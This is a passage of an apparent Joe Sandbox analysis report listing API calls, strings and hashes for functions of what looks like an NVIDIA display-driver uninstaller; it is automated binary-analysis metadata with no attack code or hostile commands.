                                  • Opcode Fuzzy Hash: 2e90b48ffb9796b8f3ed6577cbc11bc0f4312f4dcc375fb88848b854e7f4c949
                                  • Instruction Fuzzy Hash: A4E080782403017FC500DB60DD49D5F7B69DBE8701B10851D754582150DB34D940DB9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __mbschr_l_memset
                                  • String ID: %s%s%s$%s{%s
                                  • API String ID: 1518400538-84299907
                                  • Opcode ID: ff4dbc0d703da98e77adcd814d3ddb32166ffde561b20d773eb87bd2f59c29c5
                                  • Instruction ID: 66237d527c184bb21662608c6de61099bff3a96f9006310b77b238e61c59510e
                                  • Opcode Fuzzy Hash: ff4dbc0d703da98e77adcd814d3ddb32166ffde561b20d773eb87bd2f59c29c5
                                  • Instruction Fuzzy Hash: CB5105733082041BD300AA6D9C55B97B7D9DFD9318F24857FF945E7392EA79D80882E8
                                  Strings
                                  • UninstCommandClass::SetRegistry(%s), xrefs: 0040864A
                                  • SetRegistry: failed to set %s\%s=%s, xrefs: 00408744
                                  • SetRegistry: cannot find '\', xrefs: 0040869D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __strdup$Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: SetRegistry: cannot find '\'$SetRegistry: failed to set %s\%s=%s$UninstCommandClass::SetRegistry(%s)
                                  • API String ID: 3089866256-2079800986
                                  • Opcode ID: f3256fea8a8c9a4f2eca3e28be0cb130401290b621ea6ee4effb2fe9f49a2084
                                  • Instruction ID: b02ecfbaa18ad37b20d999f384c6ca90374e436a76cc69c128d9cafe8b28e8f5
                                  • Opcode Fuzzy Hash: f3256fea8a8c9a4f2eca3e28be0cb130401290b621ea6ee4effb2fe9f49a2084
                                  • Instruction Fuzzy Hash: 2631D9727403043BD210A5556C42F67B79CEBD4765F14083FFE48A62C2EA7EA90982F9
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 0040649D
                                  • _sprintf.LIBCMT ref: 004064E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs_sprintf$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: %0.2X$UninstCommandClass::GUIDToStr${%0lX-%0X-%0X-
                                  • API String ID: 676372913-759934890
                                  • Opcode ID: 5e835ca5cbbf2569a85a661860055239596436e0ac1670972b3e654356a5c8a3
                                  • Instruction ID: 2e905d4d7dcdac5bc4143f1a39e6cb48b85f65bbdfc4a122e570a6bb7480fca4
                                  • Opcode Fuzzy Hash: 5e835ca5cbbf2569a85a661860055239596436e0ac1670972b3e654356a5c8a3
                                  • Instruction Fuzzy Hash: 012137725042415BC7105F68AC516B7B796DE92328736433FFDA6673C2D63AAC24C3AC
                                  Strings
                                  • UninstCommandClass::GetSpecialFolderPath, xrefs: 00407E7D
                                  • Folder ID must be a number passed value is (%s), xrefs: 00407ED7
                                  • GetSpecialFolderPath: invalid number of arguments, xrefs: 00407E9F
                                  • GetFolderPath, xrefs: 00407EDC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: Folder ID must be a number passed value is (%s)$GetFolderPath$GetSpecialFolderPath: invalid number of arguments$UninstCommandClass::GetSpecialFolderPath
                                  • API String ID: 4132451974-1103180239
                                  • Opcode ID: 69c087b60a96538081e65396382519f9bd3f4d14d01f0391518ab4d1f502404b
                                  • Instruction ID: 98344a550c3f1d2e02586544355ede8bac48abb1df5af9f5f13b09efcfbe4250
                                  • Opcode Fuzzy Hash: 69c087b60a96538081e65396382519f9bd3f4d14d01f0391518ab4d1f502404b
                                  • Instruction Fuzzy Hash: BE110D766046016BC224E7269C42EEBB7EDAFD4704F10083FF655A32C1DA7CA90586EB
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32(?,0000100C,000000FF,00000000), ref: 00407335
                                  • SendMessageA.USER32 ref: 00407360
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • SendMessageA.USER32(?,0000100C,00000000,00000000), ref: 0040738C
                                  Strings
                                  • NVIDIA Display Driver, xrefs: 00407366
                                  • UninstCommandClass::EnableExceptDisplay, xrefs: 0040730F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSend$Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: NVIDIA Display Driver$UninstCommandClass::EnableExceptDisplay
                                  • API String ID: 3928693847-3706283040
                                  • Opcode ID: 8e3d865a6469777ae337fc8364dceadb80b04b6c412e871434ca39fdb96a2c11
                                  • Instruction ID: 3e1e3f1637bed6b7cc39a8541ded08aedb031c5aa89c23cf69578d1c725507dd
                                  • Opcode Fuzzy Hash: 8e3d865a6469777ae337fc8364dceadb80b04b6c412e871434ca39fdb96a2c11
                                  • Instruction Fuzzy Hash: 7B11DA71909340ABE320DB658C42DABB7D4AB95754F440A3EFD94632C0D678AC08C79B
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • RegOpenKeyExA.ADVAPI32 ref: 004045B8
                                  • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004045E1
                                  • RegCloseKey.ADVAPI32(0002001F), ref: 004045F0
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00404606
                                  Strings
                                  • UninstCommandClass::NvRegRemoveKeyIfEmpty, xrefs: 00404585
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CloseDebugDeleteFormatInfoLocalMutexObjectOpenOutputQueryReleaseSingleStringWait_fprintf
                                  • String ID: UninstCommandClass::NvRegRemoveKeyIfEmpty
                                  • API String ID: 3566116534-2089235062
                                  APIs
                                  • _sprintf.LIBCMT ref: 00404EE7
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00404F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Close_sprintf
                                  • String ID: %s\%s$Placing back the original Class Path$Properties
                                  • API String ID: 3634278766-2160997917
                                  APIs
                                  • _memset.LIBCMT ref: 00404A10
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00404A60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset_sprintf
                                  • String ID: Executing:%s$UninstCommandClass::DeleteRegNames(%s)$delreg HKLM\%s\%s
                                  • API String ID: 3581153556-370052421
                                  APIs
                                    • Part of subcall function 0040EF94: __amsg_exit.LIBCMT ref: 0040EFA2
                                  • __amsg_exit.LIBCMT ref: 0040E50C
                                  • __lock.LIBCMT ref: 0040E51C
                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E539
                                  • InterlockedIncrement.KERNEL32(03481670), ref: 0040E564
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                  • String ID: SB
                                  • API String ID: 4129207761-3983915703
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00408C2C
                                  • OpenServiceA.ADVAPI32(00000000,?,80000000), ref: 00408C4B
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00408C61
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00408C68
                                  Strings
                                  • UninstCommandClass::NvUninstallNvSvc, xrefs: 00408C12
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandleOpenTime_fputs$DebugFormatLocalManagerMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: UninstCommandClass::NvUninstallNvSvc
                                  • API String ID: 2625296822-1026150982
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • LoadBitmapA.USER32(?,00000074), ref: 004076BA
                                  • CreateWindowExA.USER32(00000200,STATIC,0041B8A5,8040000E,0000012C,0000012C,0000012C,0000012C,?,00000000,?,00000000), ref: 004076F6
                                  • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 00407707
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$BitmapCreateDebugFormatLoadLocalMessageMutexObjectOutputReleaseSendSingleStringWaitWindow_fprintf
                                  • String ID: STATIC$UninstCommandClass::CreateLogoWindow
                                  • API String ID: 2280148361-2848316750
                                  APIs
                                  • _sprintf.LIBCMT ref: 004098AA
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 004098E4
                                  • FindClose.KERNEL32(00000000), ref: 004098F8
                                    • Part of subcall function 00407FC0: GetPrivateProfileStringA.KERNEL32(Version,Class,(error),?,00000080,?), ref: 0040800A
                                    • Part of subcall function 00407FC0: GetPrivateProfileStringA.KERNEL32(Version,Provider,(error),?,00000080,?), ref: 00408029
                                  • FindClose.KERNEL32(00000000), ref: 0040992C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Find$ClosePrivateProfileString$FileNext__mbsicmp_l_sprintf
                                  • String ID: %s\%s$FALSE
                                  • API String ID: 2684535348-4291076793
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00407969
                                  • GetParent.USER32(?), ref: 00407981
                                  • GetParent.USER32(00000000), ref: 0040798A
                                  • SendMessageA.USER32(?,?,00000000,00000000), ref: 0040799C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ParentTime_fputs$DebugFormatLocalMessageMutexObjectOutputProcessReleaseSendSingleStringThreadWaitWindow_fprintf
                                  • String ID: cbSendMessage
                                  • API String ID: 2181095343-2246082812
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00406643
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040664F
                                  Strings
                                  • GetNativeSystemInfo, xrefs: 00406649
                                  • kernel32.dll, xrefs: 0040663B
                                  • UninstCommandClass::NvGetNativeSystemInfo, xrefs: 00406611
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AddressDebugFormatHandleLocalModuleMutexObjectOutputProcReleaseSingleStringWait_fprintf
                                  • String ID: GetNativeSystemInfo$UninstCommandClass::NvGetNativeSystemInfo$kernel32.dll
                                  • API String ID: 3434995589-933751508
                                  • Opcode ID: 8e1377ebac1bf6fa16063cf62fdd9611524483b82d37302de87c57162efe5555
                                  • Instruction ID: 07b19cc5b88e1f98c90bb973b2309d50f3cdd7225fb9d65a882ee8fb25741b4f
                                  • Opcode Fuzzy Hash: 8e1377ebac1bf6fa16063cf62fdd9611524483b82d37302de87c57162efe5555
                                  • Instruction Fuzzy Hash: 28F017F1940B009FC7A0DF759804A87BAE4EF283117008D3EE09AC7650E378E695CB9A
                                  APIs
                                  • __lock.LIBCMT ref: 004123D9
                                    • Part of subcall function 00411A2D: __mtinitlocknum.LIBCMT ref: 00411A41
                                    • Part of subcall function 00411A2D: __amsg_exit.LIBCMT ref: 00411A4D
                                    • Part of subcall function 00411A2D: EnterCriticalSection.KERNEL32(?,?,?,004137E4,00000004,00423408,0000000C,00411AB1,0040B462,0040B462,00000000,00000000,00000000,0040EF46,00000001,00000214), ref: 00411A55
                                  • __mtinitlocknum.LIBCMT ref: 00412419
                                  • __malloc_crt.LIBCMT ref: 0041245D
                                  • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00412482
                                  • EnterCriticalSection.KERNEL32(03482198,004233E8,00000010,0040C37E,00423128,0000000C,0040C3F8,00403EE1,00403EE1,00000040,00403EE1,0042AB38,0041C928), ref: 004124AC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CriticalEnterSection__mtinitlocknum$CountCritInitSpin___crt__amsg_exit__lock__malloc_crt
                                  • String ID:
                                  • API String ID: 1486408876-0
                                  • Opcode ID: 6f052533b2ef852cd1347e1d0f4184a5303911cc643afbad2bfd3d9e180b2912
                                  • Instruction ID: 8b8edbc94bf58287f8ef56951384a72dc4c5d74ea4bb63998c27d515b7f6380f
                                  • Opcode Fuzzy Hash: 6f052533b2ef852cd1347e1d0f4184a5303911cc643afbad2bfd3d9e180b2912
                                  • Instruction Fuzzy Hash: 3D31A3716007099FC721DF6AD8C199AB7E4FF09324750412EE555E72A1CBB8A8E2CF98
                                  APIs
                                  • __lock.LIBCMT ref: 0040D9EC
                                    • Part of subcall function 00411A2D: __mtinitlocknum.LIBCMT ref: 00411A41
                                    • Part of subcall function 00411A2D: __amsg_exit.LIBCMT ref: 00411A4D
                                    • Part of subcall function 00411A2D: EnterCriticalSection.KERNEL32(?,?,?,004137E4,00000004,00423408,0000000C,00411AB1,0040B462,0040B462,00000000,00000000,00000000,0040EF46,00000001,00000214), ref: 00411A55
                                  • ___sbh_find_block.LIBCMT ref: 0040D9F7
                                  • ___sbh_free_block.LIBCMT ref: 0040DA06
                                  • HeapFree.KERNEL32(00000000,?,004231F0,0000000C,00411A0E,00000000,004233A8,0000000C,00411A46,?,?,?,004137E4,00000004,00423408,0000000C), ref: 0040DA36
                                  • GetLastError.KERNEL32(?,004137E4,00000004,00423408,0000000C,00411AB1,0040B462,0040B462,00000000,00000000,00000000,0040EF46,00000001,00000214,?,?), ref: 0040DA47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                  • String ID:
                                  • API String ID: 2714421763-0
                                  • Opcode ID: 97e2bab8730f36fe53706a0f4dd7e957d16a37df18db58d550bf2025971d0a04
                                  • Instruction ID: ceaecf4fe780958945edd3fa282c0d33966a55e95548f13cfadf50fcd95cd63e
                                  • Opcode Fuzzy Hash: 97e2bab8730f36fe53706a0f4dd7e957d16a37df18db58d550bf2025971d0a04
                                  • Instruction Fuzzy Hash: F1017C71F09305AADF30BFA29806BAE3BA49F10368F54403AF414761D1DB7C89888E9D
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00403B02,?,00000000,?), ref: 00403E03
                                  • UnmapViewOfFile.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E10
                                  • CloseHandle.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E2B
                                  • ReleaseMutex.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E39
                                  • CloseHandle.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseHandle$FileMutexObjectReleaseSingleUnmapViewWait
                                  • String ID:
                                  • API String ID: 3150930710-0
                                  • Opcode ID: 26ffad49355b307d25efd377c84a7e3a22a0bf69562ba92032e3062b1166bfd1
                                  • Instruction ID: 05e884570b166271adac5bfa94f30d0153a294086ffaf45edf2fb31eb31ec10a
                                  • Opcode Fuzzy Hash: 26ffad49355b307d25efd377c84a7e3a22a0bf69562ba92032e3062b1166bfd1
                                  • Instruction Fuzzy Hash: A0F0F9716002159BC328CF68EE888523B68FB1C3613904339E925C37F0D7B55892CF9D
                                  APIs
                                  • _sprintf.LIBCMT ref: 00401D29
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 004011F0: _memset.LIBCMT ref: 00401242
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset_sprintf
                                  • String ID: CommandClass::SetValue(%s = %s)$Set %s=%s$SetValue: Out of memory adding new variable
                                  • API String ID: 3581153556-703628852
                                  • Opcode ID: 422a770fef11c5b367a2b0ac569877368e3c132bf4508b6668efda4086a354be
                                  • Instruction ID: 7f5883e76c0dc7cf640b94d19f0afc6c49d3325744ded207a184114ad69e305a
                                  • Opcode Fuzzy Hash: 422a770fef11c5b367a2b0ac569877368e3c132bf4508b6668efda4086a354be
                                  • Instruction Fuzzy Hash: 6F2167B12006409BD224E769DC41FA7B3EDFFC8744F10442EF786A72D2D678A90587A9
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetFileVersionInfoSizeA.VERSION(?,?,00000000,00010009,00260010), ref: 0040428C
                                  • GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000,?,00000000,00010009,00260010), ref: 004042B8
                                  • VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000,?,00000000,00010009,00260010), ref: 004042D1
                                  Strings
                                  • UninstCommandClass::CheckForUpdate, xrefs: 00404275
                                  Memory Dump Source
